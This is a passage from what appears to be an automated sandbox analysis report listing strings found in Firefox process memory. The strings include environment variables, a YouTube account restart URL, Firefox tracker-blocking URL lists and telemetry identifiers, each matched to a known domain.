Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files 
(x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsp equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2952270255.00000158A7AC7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3030803173.00000270C9930000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2958630660.0000014A6E160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2958630660.0000014A6E160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3030803173.00000270C9930000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2952270255.00000158A7AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exewinsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3031858393.00000270CC65D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031858393.00000270CC5D0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2957174991.00000270CC674000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3034852957.00000270D6947000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsMALLOC_OPTIONS=rII equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Must provide a boolean argument_updateFlexData/flexDataArray<isSafeToPlayDeferredEventDOM_VK_WIN_OEM_FJ_MASSHOUDOM_VK_WIN_OEM_FJ_TOUROKUmaxHistoricalSearchSuggestionsfirefox-suggest-weather-titlesuggestedIndexResultsByGroupunitConversion.suggestedIndexcanIncrementMinKeywordLengthstrippedUrlToTopPrefixAndTitleDOM_KEY_LOCATION_STANDARDfirefox-suggest-urlbar-blockfractionalDataArray is empty!experimental.hideHeuristic)?(?:\s+in\s+|\s+to\s+|\s*=\s*)(WEATHER_PROVIDER_DISPLAY_NAMEincrementMinKeywordLengthisURLEquivalentToResultURL_checkAndSetExposureProperties)(?:\s+in\s+|\s+to\s+|\s*=\s*)(TOP_SITES_MAX_SITES_PER_ROW_addSuggestedIndexResultseNewlinesReplaceWithSpacesensureUnloadHandlerRegistered/<_createShowMoreSyncedTabsElementrecordSyncedTabsTelemetryhttps://www.youtube.com/accountMIN_STATUS_ANIMATION_DURATION_createNoSyncedTabsElement equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3106563989.00000270E4116000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2999210432.00000270E4118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: PARSE_ERROR_TOO_MANY_ELEMENTS@mozilla.org/referrer-info;1Couldn't create URI from Error accessing host name: READER_MODE_DOWNLOAD_RESULT@mozilla.org/parserutils;1permission-popup-menulisthttps://www.youtube.com/account_adoptBrowserFromOtherWindow equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: PREF_ISDEFAULT_CACHE_STATEinitializeDefaultPreferencesgetProtocolHandlerInfoFromOS with insecure template URL checkHost/isIPv4Address/<nsIExternalProtocolService_migrateProtocolHandlersIfNeeded with invalid template URL browser.handlers.migrationsbrowser-open-homepage-startVALIDATE_NO_DEFAULT_FILENAMEPREF_BRANCH_WAS_REGISTEREDvalidateFileNameForSavingasyncEmitManifestEntry("author")VALIDATE_FORCE_APPEND_EXTENSION-*- UpdateBrowserIDHelper: toolkit.singletonWindowTypepreviousHandler.preferredAction.https://www.youtube.com/account_shouldViewDownloadInternallygetCombined/overrideFnArray<getMostRecentBrowserWindow@mozilla.org/browser/clh;1toolkit.defaultChromeFeatures^[a-z0-9][a-z0-9-]+[a-z0-9]$ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3034852957.00000270D6939000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: RT_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\P equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: src=image,triggeringprincipal=iconloadingprincipal,requestcontextid,fadein,pinned,selected=visuallyselected,busy,crashed,sharing,pictureinpicturehttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. 
See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: src=image,triggeringprincipal=iconloadingprincipal,requestcontextid,fadein,pinned,selected=visuallyselected,busy,crashed,sharing,pictureinpicturehttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. 
See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: src=image,triggeringprincipal=iconloadingprincipal,requestcontextid,fadein,pinned,selected=visuallyselected,busy,crashed,sharing,pictureinpicturehttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. 
See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", 
"*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: color-mix(in srgb, currentColor 14%, transparent)*://id.rambler.ru/rambler-id-helper/auth_events.js*://securepubads.g.doubleclick.net/gampad/*ad-blk*https://static.adsafeprotected.com/firefox-etp-js*://www.googleadservices.com/pagead/conversion_async.jsassemblePayloadWithMeasurements/measurementsContainGPU<assemblePayloadWithMeasurements/measurementsContainSocket<assemblePayloadWithMeasurements/payloadObj.slowSQL<assemblePayloadWithMeasurements/payloadObj.fileIOReports<browser.engagement.session_time_including_suspendresource://gre/modules/TelemetryEnvironment.sys.mjsassemblePayloadWithMeasurements/payloadObj.lateWrites<assemblePayloadWithMeasurements/payloadObj.addonDetails<saveShutdownPings - failed to submit first shutdown pingtoolkit.telemetry.shutdownPingSender.enabledFirstSessionresource://gre/modules/TelemetryTimestamps.sys.mjssaveShutdownPings - failed to submit shutdown ping_sendDailyPing - Failed to save the aborted session pingassemblePayloadWithMeasurements/measurements.keyedScalars<color-mix(in srgb, currentColor 25%, transparent)getScalars - We only support scalars in subsessions.browser.engagement.session_time_excluding_suspendassemblePayloadWithMeasurements/measurementsContainUtility<linear-gradient(90deg, #9059FF 0%, #FF4AA2 52.08%, #FFBD4F 100%)resource://gre/modules/TelemetryController.sys.mjshttps://www.amazon.com/exec/obidos/external-search/*resource://gre/modules/TelemetryControllerBase.sys.mjsdatareporting.policy.dataSubmissionPolicyNotifiedTimeresource://gre/modules/TelemetryScheduler.sys.mjsassemblePayloadWithMeasurements - caught exceptionassemblePayloadWithMeasurements/measurements.histograms<assemblePayloadWithMeasurements/measurements.keyedHistograms<resource://gre/modules/TelemetryReportingPolicy.sys.mjssaveShutdownPings - failed to submit saved-session ping_onEnvironmentChange - throttling; last 
change was assemblePayloadWithMeasurements/measurements.scalars< equals www.rambler.ru (Rambler)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" 